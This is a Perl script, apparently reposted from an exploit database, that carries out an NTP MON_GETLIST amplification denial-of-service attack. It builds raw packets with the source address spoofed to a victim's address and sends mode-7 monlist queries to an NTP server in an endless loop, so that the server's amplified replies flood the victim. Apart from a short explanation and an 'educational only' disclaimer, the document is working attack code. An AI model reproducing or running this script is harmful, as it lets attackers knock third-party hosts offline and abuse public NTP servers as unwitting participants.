###########################

# NTP MON_GETLIST Query Amplification DDoS Vulnerability

###########################

#!/usr/bin/perl
#
# ntp MON_GETLIST query amplification ddos
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# A Network Time Protocol (NTP) Amplification
# attack is an emerging form of Distributed
# Denial of Service (DDoS) that relies on the
# use of publically accessible NTP servers to
# overwhelm a victim system with UDP traffic.
# The NTP service supports a monitoring service
# that allows administrators to query the server
# for traffic counts of connected clients. This
# information is provided via the “monlist”
# command. The basic attack technique consists
# of an attacker sending a "get monlist" request
# to a vulnerable NTP server, with the source
# address spoofed to be the victim’s address.
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#

use Socket;

if ( $< != 0 ) {
print "Sorry, must be run as root!n";
print "This script use RAW Socket.n";
exit;
}

my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)

print "[ ntpd MON_GETLIST query amplification ]n";
if (!defined $ntpd || !defined $victim) {
print "[ Usg: $0 <ntp server> <victim>n";
print "[ <todor.donev@gmail.com> Todor Donev ]n";
exit;
}
print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

# Main program
sub main {
my $packet;

$packet = iphdr();
$packet .= udphdr();
$packet .= ntphdr();
# b000000m...
send_packet($packet);
}

# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)

# IP Packet
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos,
$ip_total_len, $ip_frag_id,
$ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$victim, $ntpd
);
return $iphdr;
}

# UDP Header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 123; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)

# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port,
$udp_dst_port,
$udp_len,
$udp_checksum
);
return $udphdr;
}

# NTP Header (Layer 7)
sub ntphdr {
my $rm_vn_mode = 0x27;

# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7
#
# A mode 7 packet is used exchanging data between an NTP server
# and a client for purposes other than time synchronization, e.g.
# monitoring, statistics gathering and configuration. A mode 7
# packet has the following format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |R|M| VN | Mode|A| Sequence | Implementation| Req Code |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Err | Number of data items | MBZ | Size of data item |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | Data (Minimum 0 octets, maximum 500 octets) |
# | |
# | [...] |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Encryption Keyid (when A bit set) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | Message Authentication Code (when A bit set) |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# where the fields are (note that the client sends requests, the server
# responses):
# Response Bit: This packet is a response (if clear, packet is a request).
# More Bit: Set for all packets but the last in a response which
# requires more than one packet.
# Version Number: 2 for current version
# Mode: Always 7
my $auth = 0x00; # If set, this packet is authenticated.

my $implementation = 0x03; # Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)
# The number of the implementation this request code
# is defined by. An implementation number of zero is used
# for requst codes/data formats which all implementations
# agree on. Implementation number 255 is reserved (for
# extensions, in case we run out).

my $request = 0x2a; # Request code is an implementation-specific code which specifies the
# operation to be (which has been) performed and/or the
# format and semantics of the data included in the packet
# 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),
# 0x04 (SYS_STATS), 0x2a (MON_GETLIST)
# NTP packet
my $ntphdr = pack(
'W2 C2 C2 C2',
$rm_vn_mode,
$auth,
$implementation,
$request
);
return $ntphdr;
}

sub send_packet {
while(1){
select(undef, undef, undef, 0.30); # Sleep 300 milliseconds
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;
}
}


###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-07-10]

###########################